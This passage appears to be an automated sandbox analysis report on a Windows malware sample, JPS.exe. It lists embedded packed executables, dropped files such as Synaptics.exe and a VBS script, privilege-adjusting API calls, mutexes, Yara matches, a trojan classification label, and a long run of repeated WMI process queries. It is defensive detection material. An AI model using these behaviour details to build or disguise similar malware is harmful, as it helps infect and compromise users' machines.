                              Source: JPS.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                              Source: JPS.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Source: Synaptics.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                              Source: Synaptics.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Source: RCX5246.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Source: ~$cache1.3.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Source: JPS.exe, 00000000.00000003.1308288097.00000000023E0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameb! vs JPS.exe
                              Source: JPS.exe, 00000000.00000003.1308388322.00000000006C6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs JPS.exe
                              Source: JPS.exe, 00000000.00000003.1308388322.00000000006C6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFileNameQO"0 vs JPS.exe
                              Source: JPS.exe, 00000000.00000000.1298292720.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileName vs JPS.exe
                              Source: JPS.exe, 00000000.00000003.1308538037.00000000006FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs JPS.exe
                              Source: JPS.exeBinary or memory string: OriginalFileName vs JPS.exe
                              Source: JPS.exeBinary or memory string: OriginalFilenameb! vs JPS.exe
                              Source: JPS.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                              Source: ._cache_JPS.exe.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.988707228301187
                              Source: XNLAGO.exe.2.drStatic PE information: Section: UPX1 ZLIB complexity 0.988707228301187
                              Source: classification engineClassification label: mal100.troj.expl.evad.winEXE@21/53@9/4
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00ADD712 GetLastError,FormatMessageW,2_2_00ADD712
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00ACB8B0 AdjustTokenPrivileges,CloseHandle,2_2_00ACB8B0
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00ACBEC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,2_2_00ACBEC3
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_0076B8B0 AdjustTokenPrivileges,CloseHandle,10_2_0076B8B0
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_0076BEC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,10_2_0076BEC3
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00ADEA85 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,2_2_00ADEA85
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AD6F5B CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,2_2_00AD6F5B
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00ADEFCD CoInitialize,CoCreateInstance,CoUninitialize,2_2_00ADEFCD
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00A931F2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,2_2_00A931F2
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
                              Source: C:\Users\user\Desktop\JPS.exeFile created: C:\Users\user\Desktop\._cache_JPS.exeJump to behavior
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7716:120:WilError_03
                              Source: C:\ProgramData\Synaptics\Synaptics.exeMutant created: \Sessions\1\BaseNamedObjects\Synaptics2X
                              Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7604
                              Source: C:\Users\user\Desktop\._cache_JPS.exeFile created: C:\Users\user\AppData\Local\Temp\BQQQVU.vbsJump to behavior
                              Source: Yara matchFile source: JPS.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.JPS.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000000.1298292720.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: C:\ProgramData\Synaptics\RCX5246.tmp, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\Documents\~$cache1, type: DROPPED
                              Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                              Source: C:\Users\user\Desktop\._cache_JPS.exeProcess created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user\AppData\Local\Temp\BQQQVU.vbs
                              Source: C:\Users\user\Desktop\JPS.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
